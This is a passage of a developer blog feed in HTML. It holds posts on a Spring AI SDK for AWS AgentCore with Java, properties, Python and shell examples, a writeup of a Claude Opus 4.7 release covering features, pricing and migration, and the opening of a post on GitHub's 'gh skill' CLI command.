            &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;call&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt;
            &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
    &lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;record&lt;/span&gt; &lt;span class="nf"&gt;PromptRequest&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;String&lt;/span&gt; &lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;@AgentCoreInvocation&lt;/code&gt; annotation auto-configures the &lt;code&gt;/invocations&lt;/code&gt; POST endpoint and the &lt;code&gt;/ping&lt;/code&gt; health endpoint, handles JSON serialization, detects async tasks and reports busy status so AgentCore doesn't scale down mid-execution, and manages response formatting. No custom controllers.&lt;/p&gt;
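&lt;p&gt;To make that contract concrete, here's a minimal client-side sketch of what the SDK is serving. The base URL and port are assumptions for local testing; the JSON body simply mirrors the fields of the &lt;code&gt;PromptRequest&lt;/code&gt; record.&lt;/p&gt;

```python
import json
from urllib import request

# Sketch of the AgentCore Runtime contract the SDK implements for you:
# POST /invocations with a JSON body matching the method's parameter
# type, plus GET /ping for health. Base URL is an assumption.
BASE = "http://localhost:8080"

def build_invocation(prompt: str) -> request.Request:
    # The JSON keys mirror the PromptRequest record's fields.
    body = json.dumps({"prompt": prompt}).encode("utf-8")
    return request.Request(f"{BASE}/invocations", data=body,
                           headers={"Content-Type": "application/json"})

def send(req: request.Request) -> str:
    # Call this against a running agent; not executed here.
    with request.urlopen(req) as resp:
        return resp.read().decode("utf-8")

req = build_invocation("Summarize this incident report")
print(req.get_method(), req.full_url)  # POST http://localhost:8080/invocations
```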

&lt;p&gt;Want streaming? Change the return type:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight java"&gt;&lt;code&gt;&lt;span class="nd"&gt;@AgentCoreInvocation&lt;/span&gt;
&lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="nc"&gt;Flux&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nc"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;streamingChat&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;PromptRequest&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;chatClient&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;prompt&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;prompt&lt;/span&gt;&lt;span class="o"&gt;())&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;stream&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The SDK switches to SSE output automatically and handles framing, backpressure, and connection lifecycle.&lt;/p&gt;

&lt;h2&gt;
  
  
  Adding Memory
&lt;/h2&gt;

&lt;p&gt;The SDK integrates AgentCore Memory through Spring AI's advisor pattern — interceptors that enrich prompts with context before they hit the model.&lt;/p&gt;

&lt;p&gt;Short-term memory uses a sliding window of recent messages. Long-term memory persists across sessions using four strategies: semantic (factual user info), user preference (explicit settings), summary (condensed history), and episodic (past interactions). AgentCore consolidates these asynchronously.&lt;/p&gt;

&lt;p&gt;Configuration is minimal:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight properties"&gt;&lt;code&gt;&lt;span class="py"&gt;agentcore.memory.memory-id&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;${AGENTCORE_MEMORY_ID}&lt;/span&gt;
&lt;span class="py"&gt;agentcore.memory.long-term.auto-discovery&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then compose it into your chat client:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight java"&gt;&lt;code&gt;&lt;span class="nd"&gt;@AgentCoreInvocation&lt;/span&gt;
&lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="nc"&gt;String&lt;/span&gt; &lt;span class="nf"&gt;chat&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;PromptRequest&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nc"&gt;AgentCoreContext&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="nc"&gt;String&lt;/span&gt; &lt;span class="n"&gt;sessionId&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getHeader&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;AgentCoreHeaders&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;SESSION_ID&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;chatClient&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;prompt&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;prompt&lt;/span&gt;&lt;span class="o"&gt;())&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;advisors&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;agentCoreMemory&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;advisors&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;advisors&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;param&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;ChatMemory&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;CONVERSATION_ID&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"user:"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;sessionId&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;call&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Auto-discovery mode detects available LTM strategies without manual configuration.&lt;/p&gt;

&lt;h2&gt;
  
  
  Browser and Code Execution as Tools
&lt;/h2&gt;

&lt;p&gt;AgentCore exposes two additional capabilities as Spring AI tool callbacks via &lt;code&gt;ToolCallbackProvider&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Browser automation&lt;/strong&gt; — agents can navigate websites, extract content, take screenshots, and interact with page elements.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code interpreter&lt;/strong&gt; — agents write and run Python, JavaScript, or TypeScript in a secure sandbox. The sandbox includes numpy, pandas, and matplotlib. Generated files go through an artifact store.&lt;/p&gt;

&lt;p&gt;Both are added as Maven dependencies and wired in through the constructor:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight java"&gt;&lt;code&gt;&lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="nf"&gt;MyAgent&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;
    &lt;span class="nc"&gt;ChatClient&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;Builder&lt;/span&gt; &lt;span class="n"&gt;builder&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;
    &lt;span class="nc"&gt;AgentCoreMemory&lt;/span&gt; &lt;span class="n"&gt;agentCoreMemory&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;
    &lt;span class="nd"&gt;@Qualifier&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"browserToolCallbackProvider"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nc"&gt;ToolCallbackProvider&lt;/span&gt; &lt;span class="n"&gt;browserTools&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;
    &lt;span class="nd"&gt;@Qualifier&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"codeInterpreterToolCallbackProvider"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nc"&gt;ToolCallbackProvider&lt;/span&gt; &lt;span class="n"&gt;codeInterpreterTools&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;

    &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;chatClient&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;builder&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;defaultToolCallbacks&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;browserTools&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="n"&gt;codeInterpreterTools&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
        &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The model decides which tool to call based on the user's request; both tool sets are equally visible to it.&lt;/p&gt;

&lt;h2&gt;
  
  
  MCP Integration via AgentCore Gateway
&lt;/h2&gt;

&lt;p&gt;Spring AI agents can connect to organizational tools through AgentCore Gateway, which provides MCP support with outbound authentication and a semantic tool registry. Configure your Spring AI MCP client to point at Gateway:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight properties"&gt;&lt;code&gt;&lt;span class="py"&gt;spring.ai.mcp.client.toolcallback.enabled&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;spring.ai.mcp.client.initialized&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;false&lt;/span&gt;
&lt;span class="py"&gt;spring.ai.mcp.client.streamable-http.connections.gateway.url&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;${GATEWAY_URL}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Gateway handles credential management for downstream services. Agents discover and invoke enterprise tools without managing auth themselves.&lt;/p&gt;

&lt;h2&gt;
  
  
  Deployment Options
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;AgentCore Runtime&lt;/strong&gt; — package as an ARM64 container, push to ECR, create a Runtime pointing at the image. AWS handles scaling and health monitoring, and pricing is pay-per-use (no charge for idle compute). Terraform examples are in the repo.&lt;/p&gt;
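&lt;p&gt;A minimal push-to-ECR sketch, assuming the Docker and AWS CLIs are installed; the account ID, region, and image name are placeholders:&lt;br&gt;
&lt;/p&gt;

```shell
# AgentCore Runtime expects a linux/arm64 image
docker buildx build --platform linux/arm64 -t my-agent:latest .

# authenticate to ECR, then tag and push
aws ecr get-login-password --region us-east-1 | \
  docker login --username AWS --password-stdin 123456789012.dkr.ecr.us-east-1.amazonaws.com
docker tag my-agent:latest 123456789012.dkr.ecr.us-east-1.amazonaws.com/my-agent:latest
docker push 123456789012.dkr.ecr.us-east-1.amazonaws.com/my-agent:latest
```

From there, create the Runtime pointing at the pushed image (the repo's Terraform examples cover that part).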

&lt;p&gt;&lt;strong&gt;Standalone&lt;/strong&gt; — use individual modules (Memory, Browser, Code Interpreter) in applications running on EKS, ECS, EC2, or on-premises. Teams can adopt incrementally — add memory to an existing Spring Boot service before considering a full migration to AgentCore Runtime.&lt;/p&gt;

&lt;h2&gt;
  
  
  Design Principles
&lt;/h2&gt;

&lt;p&gt;The SDK is built around three ideas: convention over configuration (sensible defaults, port 8080, standard endpoint paths), annotation-driven development (one annotation replaces weeks of infrastructure code), and deployment flexibility (you're not locked into AgentCore Runtime to use the individual modules).&lt;/p&gt;

&lt;p&gt;It's open source under Apache 2.0. The repo has five example applications ranging from a minimal agent to a full OAuth-authenticated setup with per-user memory isolation.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's Coming
&lt;/h2&gt;

&lt;p&gt;The team has flagged three upcoming additions: observability integration with CloudWatch, LangFuse, Datadog, and Dynatrace via OpenTelemetry; an evaluations framework for testing agent response quality; and advanced identity management for streamlined security context handling.&lt;/p&gt;

&lt;h2&gt;
  
  
  Getting Started
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;dependency&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;groupId&amp;gt;&lt;/span&gt;org.springaicommunity&lt;span class="nt"&gt;&amp;lt;/groupId&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;artifactId&amp;gt;&lt;/span&gt;spring-ai-agentcore-runtime-starter&lt;span class="nt"&gt;&amp;lt;/artifactId&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/dependency&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Repo: &lt;a href="https://github.com/spring-ai-community/spring-ai-agentcore" rel="noopener noreferrer"&gt;github.com/spring-ai-community/spring-ai-agentcore&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Docs: &lt;a href="https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/what-is-agentcore.html" rel="noopener noreferrer"&gt;docs.aws.amazon.com/bedrock-agentcore&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There's also a four-hour workshop that walks through building a travel and expense management agent from scratch — memory, browser, code execution, MCP integration, deployed serverless with auth. No ML experience required.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I cover AI infrastructure and developer tools on the &lt;a href="https://youtube.com/@shreesozo" rel="noopener noreferrer"&gt;Shreesozo YouTube channel&lt;/a&gt;. AI Infra Weekly drops every Friday.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>aws</category>
      <category>java</category>
      <category>agents</category>
    </item>
    <item>
      <title>Everything You Need to Know About Claude Opus 4.7</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Fri, 17 Apr 2026 02:41:18 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/everything-you-need-to-know-about-claude-opus-47-3kjf</link>
      <guid>https://zeroday.forem.com/om_shree_0709/everything-you-need-to-know-about-claude-opus-47-3kjf</guid>
      <description>&lt;p&gt;Anthropic dropped Claude Opus 4.7 yesterday. It's a direct upgrade to Opus 4.6 — same price, same API shape, meaningfully better at the things that actually matter for production agentic work.&lt;/p&gt;

&lt;p&gt;Here's what changed and what you actually need to know before migrating.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Core Improvements
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Coding and agentic tasks&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is where the biggest gains are. Opus 4.7 is noticeably better on hard, long-running coding problems — the kind where Opus 4.6 would stall, loop, or hand back something half-finished.&lt;/p&gt;

&lt;p&gt;Cursor saw a 70% pass rate on their internal benchmark, up from 58% with Opus 4.6. CodeRabbit saw a 10%+ recall improvement on difficult PRs. Notion's agent team reported 14% better task completion with fewer tokens and a third of the tool errors. Rakuten's SWE-Bench testing showed Opus 4.7 resolving 3x more production tasks.&lt;/p&gt;

&lt;p&gt;What's actually different under the hood: the model is better at verifying its own outputs before reporting back. It catches its own logical faults during planning. It pushes through tool failures that used to stop the previous model cold. For agentic workflows, that consistency matters more than raw benchmark numbers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Instruction following — with a catch&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Opus 4.7 is substantially more literal about following instructions. That sounds straightforwardly good, and it mostly is. But there's a real migration implication: prompts written for earlier Claude models assumed some loose interpretation. Opus 4.7 takes instructions at face value. If your prompt says something ambiguous, you'll get a more literal result than you expected.&lt;/p&gt;

&lt;p&gt;Worth auditing your existing prompts before switching over.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Vision: 3x the resolution&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Opus 4.7 now accepts images up to 2,576 pixels on the long edge, roughly 3.75 megapixels. Previous Claude models topped out at about 1.15 megapixels. This is a model-level change — you don't need to change anything in your API calls. Images just get processed at higher fidelity automatically.&lt;/p&gt;

&lt;p&gt;What this unlocks in practice: dense screenshots for computer-use agents, complex technical diagrams, chemical structures, any visual work where the detail actually matters. XBOW, which builds autonomous penetration testing tools, saw their visual acuity benchmark go from 54.5% with Opus 4.6 to 98.5%. That's not a marginal improvement — that's a different class of capability.&lt;/p&gt;

&lt;p&gt;One note: higher resolution means more tokens consumed. If you don't need the extra fidelity, downsample before sending.&lt;/p&gt;
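&lt;p&gt;A small client-side sketch with Pillow; the 1,568px target here is an arbitrary illustration, not a documented threshold:&lt;br&gt;
&lt;/p&gt;

```python
from PIL import Image

def downsample(src, dst, max_long_edge=1568):
    """Shrink an image so its long edge is at most max_long_edge pixels."""
    img = Image.open(src)
    # thumbnail() resizes in place, preserves aspect ratio, and never upscales
    img.thumbnail((max_long_edge, max_long_edge))
    img.save(dst)
    return img.size
```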

&lt;p&gt;&lt;strong&gt;Memory across sessions&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Opus 4.7 is better at using filesystem-based memory. It carries notes forward across long multi-session work and uses them to reduce the setup overhead on new tasks. For anyone running multi-day agentic workflows, this is genuinely useful.&lt;/p&gt;

&lt;h2&gt;
  
  
  New API Features Launching Alongside
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;xhigh&lt;/code&gt; effort level&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;There's a new effort tier between &lt;code&gt;high&lt;/code&gt; and &lt;code&gt;max&lt;/code&gt;. The full ladder is now: &lt;code&gt;low&lt;/code&gt; → &lt;code&gt;medium&lt;/code&gt; → &lt;code&gt;high&lt;/code&gt; → &lt;code&gt;xhigh&lt;/code&gt; → &lt;code&gt;max&lt;/code&gt;. In Claude Code, Anthropic has raised the default to &lt;code&gt;xhigh&lt;/code&gt; for all plans.&lt;/p&gt;

&lt;p&gt;For coding and agentic use cases, Anthropic recommends starting with &lt;code&gt;high&lt;/code&gt; or &lt;code&gt;xhigh&lt;/code&gt;. Max effort is there for the hardest problems where you want to throw everything at it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Task budgets (public beta)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Developers can now set token spend budgets on the API, giving Claude a way to allocate effort across longer runs rather than burning all its compute on early steps. Useful for agentic pipelines where you want the model to prioritize intelligently.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;/ultrareview&lt;/code&gt; in Claude Code&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A new slash command that produces a dedicated review session — reads through your changes and flags bugs and design issues a careful reviewer would catch. Pro and Max users get three free ultrareviews to try it out.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Auto mode extended to Max users&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Auto mode lets Claude make tool-use decisions on your behalf, so you can run longer tasks with fewer interruptions. Previously limited, now available to Max plan users.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Cybersecurity Angle
&lt;/h2&gt;

&lt;p&gt;This one is worth understanding properly.&lt;/p&gt;

&lt;p&gt;Last week Anthropic announced Project Glasswing, which assessed AI risks in cybersecurity. They stated they'd keep Claude Mythos Preview limited and test new cyber safeguards on less capable models first.&lt;/p&gt;

&lt;p&gt;Opus 4.7 is the first model in that pipeline. Its cyber capabilities are intentionally less advanced than Mythos Preview — Anthropic experimented with selectively reducing these during training. And it ships with automatic safeguards that detect and block prohibited or high-risk cybersecurity requests.&lt;/p&gt;

&lt;p&gt;If you do legitimate security work — vulnerability research, penetration testing, red-teaming — there's a new Cyber Verification Program you can apply to join. That gets you access to the capabilities that would otherwise be blocked.&lt;/p&gt;

&lt;h2&gt;
  
  
  Pricing and Availability
&lt;/h2&gt;

&lt;p&gt;Same as Opus 4.6: &lt;strong&gt;$5 per million input tokens, $25 per million output tokens&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Available via Claude.ai, the API (&lt;code&gt;claude-opus-4-7&lt;/code&gt;), Amazon Bedrock, Google Cloud Vertex AI, and Microsoft Foundry.&lt;/p&gt;

&lt;h2&gt;
  
  
  Migration Notes
&lt;/h2&gt;

&lt;p&gt;Two things that affect token usage when moving from Opus 4.6:&lt;/p&gt;

&lt;p&gt;First, Opus 4.7 uses an updated tokenizer. The same input can map to roughly 1.0–1.35x more tokens depending on content type. This varies — code and structured text tend toward the higher end.&lt;/p&gt;

&lt;p&gt;Second, the model thinks more at higher effort levels, especially on later turns in agentic settings. More output tokens per complex task.&lt;/p&gt;

&lt;p&gt;Anthropic's own testing shows the net effect is favorable on coding evaluations, but the right move is to measure it on your actual traffic before committing. They've published a migration guide at &lt;code&gt;platform.claude.com/docs/en/about-claude/models/migration-guide&lt;/code&gt;.&lt;/p&gt;
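&lt;p&gt;To ballpark the tokenizer effect before measuring real traffic, a back-of-the-envelope sketch; the monthly volumes and the 1.2x multiplier are made-up illustrations, while the per-token prices are the published $5/$25 per million:&lt;br&gt;
&lt;/p&gt;

```python
INPUT_PRICE = 5 / 1_000_000    # dollars per input token
OUTPUT_PRICE = 25 / 1_000_000  # dollars per output token

def monthly_cost(input_tokens, output_tokens, tokenizer_multiplier=1.0):
    """Estimate spend; the multiplier models the 1.0-1.35x
    tokenizer change on the input side."""
    return (input_tokens * tokenizer_multiplier * INPUT_PRICE
            + output_tokens * OUTPUT_PRICE)

baseline = monthly_cost(200e6, 20e6)       # hypothetical Opus 4.6 workload
migrated = monthly_cost(200e6, 20e6, 1.2)  # same traffic on 4.7
```

That's the worst case before accounting for the model finishing tasks in fewer turns, which is why measuring on your own traffic is the right call.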

&lt;h2&gt;
  
  
  Should You Upgrade
&lt;/h2&gt;

&lt;p&gt;For straightforward API usage, yes. Same price, better results across coding, vision, and long-horizon tasks. The tokenizer change means costs may shift slightly but the model is more efficient in how it uses those tokens.&lt;/p&gt;

&lt;p&gt;For production agentic pipelines, audit your prompts first. The stricter instruction following is a feature, but it will surface ambiguities in prompts that Opus 4.6 quietly papered over. Fix those before flipping the switch.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I cover Anthropic model releases and agentic AI infrastructure on our &lt;a href="https://youtube.com/@shreesozo" rel="noopener noreferrer"&gt;YouTube channel&lt;/a&gt;. MCP Weekly drops every Monday.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>claude</category>
      <category>discuss</category>
    </item>
    <item>
      <title>`gh skill`: GitHub's New CLI Command Turns Agent Skills Into Installable Packages</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Thu, 16 Apr 2026 22:31:59 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/gh-skill-githubs-new-cli-command-turns-agent-skills-into-installable-packages-2p82</link>
      <guid>https://zeroday.forem.com/om_shree_0709/gh-skill-githubs-new-cli-command-turns-agent-skills-into-installable-packages-2p82</guid>
      <description>&lt;p&gt;I've been using SKILL.md files in my local Claude Code setup for months. Custom instructions for different tasks, each living in its own folder, each teaching the agent how to behave for a specific workflow. Works well. The annoying part has always been distribution — if I want to reuse a skill on another machine, I'm copying files manually like it's 2012.&lt;/p&gt;

&lt;p&gt;GitHub apparently had the same frustration. Last week they shipped &lt;code&gt;gh skill&lt;/code&gt;, a new GitHub CLI command that does for agent skills what npm did for packages.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Even Are Agent Skills
&lt;/h2&gt;

&lt;p&gt;Skills are SKILL.md files — folders of instructions, scripts, and resources that tell an AI agent how to handle a specific task. Write a documentation page. Run a specific test pattern. Format output a certain way.&lt;/p&gt;

&lt;p&gt;They follow the open Agent Skills spec at agentskills.io and work across GitHub Copilot, Claude Code, Cursor, Codex, and Gemini CLI. The skill doesn't know or care which agent loads it.&lt;/p&gt;
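&lt;p&gt;A minimal skill, sketched from that description; the frontmatter keys follow the agentskills.io convention as I understand it, and the instructions themselves are invented for illustration:&lt;br&gt;
&lt;/p&gt;

```markdown
---
name: documentation-writer
description: Use when asked to write or update project documentation.
---

# Documentation Writer

When writing docs:
1. Match the tone and structure of the existing README.
2. Keep every code example minimal and runnable.
3. End each page with a short "Next steps" section.
```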

&lt;h2&gt;
  
  
  What Shipped
&lt;/h2&gt;

&lt;p&gt;Requires GitHub CLI v2.90.0 or later.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Install a skill:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gh skill &lt;span class="nb"&gt;install &lt;/span&gt;github/awesome-copilot documentation-writer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Target a specific agent and scope:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gh skill &lt;span class="nb"&gt;install &lt;/span&gt;github/awesome-copilot documentation-writer &lt;span class="nt"&gt;--agent&lt;/span&gt; claude-code &lt;span class="nt"&gt;--scope&lt;/span&gt; user
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Skills go to the correct directory for your agent host automatically. No manual path work.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Pin to a version:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gh skill &lt;span class="nb"&gt;install &lt;/span&gt;github/awesome-copilot documentation-writer &lt;span class="nt"&gt;--pin&lt;/span&gt; v1.2.0

&lt;span class="c"&gt;# Or pin to a commit for full reproducibility&lt;/span&gt;
gh skill &lt;span class="nb"&gt;install &lt;/span&gt;github/awesome-copilot documentation-writer &lt;span class="nt"&gt;--pin&lt;/span&gt; abc123def
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Pinned skills get skipped during &lt;code&gt;gh skill update --all&lt;/code&gt;, so upgrades are deliberate.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Check for updates:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gh skill update           &lt;span class="c"&gt;# interactive&lt;/span&gt;
gh skill update &lt;span class="nt"&gt;--all&lt;/span&gt;     &lt;span class="c"&gt;# everything at once&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Validate and publish your own:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
